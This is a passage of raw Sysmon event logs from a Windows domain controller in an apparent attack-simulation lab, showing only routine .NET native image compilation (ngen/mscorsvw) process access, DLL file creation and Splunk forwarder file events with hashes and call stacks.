ll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.022{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EB-60D3-F803-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:43.006{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1EB-60D3-F803-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020992Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:43.006{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EB-60D3-F803-00000000CF01}7064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:44.600{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B67E9C4D88832C3B2D377736B8F54ADA,SHA256=A5FE5E5BB597835C4C7D6C009C8AE7E6132EEE837561C1FA013401C77FF166AB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:45.959{4DB9351A-A1EB-60D3-FB03-00000000CF01}92C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\5c-0\Microsoft.Windows.ServerManager.Common.dll2021-06-23 21:04:45.943 23542300x800000000000000021008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:45.615{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD2E717AF64E1AAC67875A561B909267,SHA256=242238B897721EF931FB6A2B34B67E2199D1EF733CA39A402AC9968E5DD9E68F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.912{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.896{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.896{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-0104-00000000CF01}7076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.834{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F0829CDC056144F1460C2ABE463E49E,SHA256=CA01D86F65E9CAEADC614451D76E41C7CE29179B650D24D8ED1A80AC8596B48C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.818{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-0004-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.787{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-0004-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.787{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-0004-00000000CF01}5476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:46.756{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bb8-0\Microsoft.Windows.ServerManager.DhcpServer.Plugin.dll2021-06-23 21:04:46.756 23542300x800000000000000021023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.646{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A2A9C071625C57CC677A807DA6F4BD,SHA256=8AB2ABA13C31CF425B27EFF0256939F8E0ED723D401D9BE2C681249DD70CAA5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.522{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.506{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.506{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FF03-00000000CF01}7096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FE03-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.381{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FE03-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.381{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FE03-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:46.365{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1688-0\Microsoft.Windows.ServerManager.Deployment.Extension.dll2021-06-23 21:04:46.365 10341000x800000000000000021015Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.261{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021014Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.240{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021013Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.240{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EE-60D3-FD03-00000000CF01}5768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021012Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:46.178{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EE-60D3-FC03-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:46.163{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EE-60D3-FC03-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
